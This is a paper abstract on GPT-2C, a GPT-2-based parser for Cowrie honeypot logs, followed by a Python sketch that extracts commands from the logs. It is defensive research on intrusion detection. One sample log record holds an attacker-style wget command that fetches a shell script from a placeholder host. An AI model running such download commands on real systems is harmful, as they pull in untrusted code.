GPT-2C: a parser for honeypot logs using large pre-trained language models

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos
Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining, published 2021-11-08
DOI: 10.1145/3487351.3492723 (https://doi.org/10.1145/3487351.3492723)
Citations: 13

Abstract

Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fusing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances in honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.
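
To make the parsing task concrete, the sketch below shows what pulling Unix commands out of honeypot log lines can look like. It is not the GPT-2C system and involves no language model: it is a plain field-lookup baseline, assuming Cowrie's JSON log output with one JSON object per line, where command events carry the event id `cowrie.command.input` and the typed command in an `input` field. The function name `extract_commands` and the sample records are hypothetical and made up for illustration.

```python
import json
from typing import Iterable, Iterator

# Assumption: command events in Cowrie's JSON log use this event id and
# store the attacker's typed command in the "input" field.
COMMAND_EVENT = "cowrie.command.input"


def extract_commands(lines: Iterable[str]) -> Iterator[dict]:
    """Yield the session id and raw command for each command event."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip partially written or non-JSON lines
        if not isinstance(event, dict):
            continue  # valid JSON, but not an event record
        if event.get("eventid") != COMMAND_EVENT:
            continue  # ignore logins, connections, and other events
        yield {
            "session": event.get("session"),
            "command": event.get("input", ""),
        }


# Made-up sample records, not taken from the paper or a real honeypot.
sample_log = [
    '{"eventid": "cowrie.login.success", "session": "a1", "username": "root"}',
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "uname -a"}',
    "not json",
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "wget http://example.invalid/x.sh"}',
]

commands = list(extract_commands(sample_log))
for item in commands:
    print(item["session"], item["command"])
```

A lookup like this only works when the log is already structured and the field names are known in advance. The abstract's point is that a fine-tuned language model is used to parse dynamic log output at run time, which a fixed rule of this kind does not attempt.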